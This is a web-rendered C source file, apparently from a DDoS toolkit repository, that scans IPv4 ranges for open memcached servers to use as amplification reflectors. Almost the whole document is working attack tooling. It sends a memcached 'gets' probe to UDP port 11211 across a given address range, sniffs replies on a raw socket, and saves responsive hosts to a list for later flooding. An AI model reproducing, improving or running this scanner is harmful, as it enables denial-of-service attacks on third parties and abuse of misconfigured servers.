Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/DDOS Scripts/AMP Methods/Memcache Amplification/scanner.c
4607 views
1
/*

2
 * Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 

3
 */

4
#include <pthread.h>

5
#include <unistd.h>

6
#include <stdio.h>

7
#include <stdlib.h>

8
#include <string.h>

9
#include <sys/socket.h>

10
#include <netinet/in.h>

11
#include <signal.h>

12
#include <sys/time.h>

13
#include <sys/types.h>

14
#include <math.h>

15
#include <ctype.h>

16
#include <errno.h>

17
#include <arpa/inet.h>

18
#include <netinet/ip.h>

19
#include <netinet/udp.h>

20


21
volatile int running_threads = 0;

22
volatile int found_srvs = 0;

23
volatile unsigned long per_thread = 0;

24
volatile unsigned long start = 0;

25
volatile unsigned long scanned = 0;

26
volatile int sleep_between = 0;

27
volatile int bytes_sent = 0;

28
volatile unsigned long hosts_done = 0;

29
FILE *fd;

30
char payload[] =

31
"\0\x01\0\0\0\x01\0\0gets a b c d e f g h j k l m n o p q r s t w v u x y a\r\n";

32


33
size = sizeof(payload);

34


35
void *flood(void *par1)

36
{

37
    running_threads++;

38
    int thread_id = (int)par1;

39
    unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));

40
    unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));

41
    unsigned long w;

42
    int y;

43
    unsigned char buf[65536];

44
    memset(buf, 0x01, 65);

45
    int sizeofpayload = 65;

46
    int sock;

47
    if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {

48
        printf("[+] MemCached [+] Somenthing are wrong, try again. [+] MemCached [+]\n");

49
        exit(-1);

50
    }

51
    for(w=ntohl(start_ip);w<htonl(end);w++)

52
    {

53
        struct sockaddr_in servaddr;

54
        bzero(&servaddr, sizeof(servaddr));

55
        servaddr.sin_family = AF_INET;

56
        servaddr.sin_addr.s_addr=htonl(w);

57
        servaddr.sin_port=htons(11211);

58
        sendto(sock,payload,size,0, (struct sockaddr *)&servaddr,sizeof(servaddr));

59
        bytes_sent+=size;

60
        scanned++;

61
        hosts_done++;

62
    }

63
    close(sock);

64
    running_threads--;

65
    return;

66
}

67


68
void sighandler(int sig)

69
{

70
    fclose(fd);

71
    printf("\n");

72
    exit(0);

73
}

74


75
void *recievethread()

76
{

77
    printf("\n");

78
    int saddr_size, data_size, sock_raw;

79
    struct sockaddr_in saddr;

80
    struct in_addr in;

81


82
    unsigned char *buffer = (unsigned char *)malloc(65536);

83
    sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);

84
    if(sock_raw < 0)

85
    {

86
        printf("[+] MemCached [+] Somenthing are wrong, try again. [+] MemCached [+]\n");

87
        exit(1);

88
    }

89
    while(1)

90
    {

91
        saddr_size = sizeof saddr;

92
        data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);

93
        if(data_size <0 )

94
        {

95
            printf("[+] MemCached [+] Somenthing are wrong, try again. [+] MemCached [+]\n");

96
            exit(1);

97
        }

98
        struct iphdr *iph = (struct iphdr*)buffer;

99
        if(iph->protocol == 17)

100
        {

101
            unsigned short iphdrlen = iph->ihl*4;

102
            struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);

103
            unsigned char* payload = buffer + iphdrlen + 67;

104
            if(ntohs(udph->source) == 11211)

105
            {

106
                int body_length = data_size - iphdrlen - 67;

107


108
                if (body_length > 40)

109


110
                {

111
                found_srvs++;

112
				printf("[+] MemCached [+] Found New Server %s.\n", inet_ntoa(saddr.sin_addr));

113
                fprintf(fd,"%s\n",inet_ntoa(saddr.sin_addr));

114
                fflush(fd);

115


116
                }

117


118
            }

119
        }

120


121
    }

122
    close(sock_raw);

123


124
}

125


126
int main(int argc, char *argv[ ])

127
{

128


129
    if(argc < 6){

130
		printf("[+] MemCached Scanner [+]\n");

131
        fprintf(stdout, "[+] Use: %s <class to start (192.168.0.1)> <class to end (198.255.255.255)> <file to save list> <threads (30)> <scan delay in ms (20)>\n", argv[0]);

132
        exit(-1);

133
    }

134
    fd = fopen(argv[3], "a");

135
    sleep_between = atoi(argv[5]);

136


137
    signal(SIGINT, &sighandler);

138


139
    int threads = atoi(argv[4]);

140
    pthread_t thread;

141


142
    pthread_t listenthread;

143
    pthread_create( &listenthread, NULL, &recievethread, NULL);

144


145
    char *str_start = malloc(18);

146
    memset(str_start, 0, 18);

147
    str_start = argv[1];

148
    char *str_end = malloc(18);

149
    memset(str_end, 0, 18);

150
    str_end = argv[2];

151
    start = inet_addr(str_start);

152
    per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;

153
    unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));

154
    int i;

155
    for(i = 0;i<threads;i++){

156
        pthread_create( &thread, NULL, &flood, (void *) i);

157
    }

158
    sleep(1);

159
    printf("[+] MemCached [+] Scanning STARTED! Wait a few minutes..\n\n\n\n\n\n");

160


161
    char *new;

162
    new = (char *)malloc(16*6);

163
    while (running_threads > 0)

164
    {

165
        fflush(stdout);

166
        bytes_sent=0;

167
        scanned = 0;

168
        sleep(1);

169
    }

170
    printf("\n");

171
    fclose(fd);

172
    return 0;

173
}

174